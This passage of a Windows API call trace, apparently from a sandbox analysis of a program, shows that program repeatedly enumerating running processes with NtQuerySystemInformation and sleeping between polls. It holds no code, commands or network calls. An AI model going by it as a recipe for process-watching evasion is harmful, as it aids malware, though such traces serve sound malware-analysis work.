BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.619] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.637] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.963] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 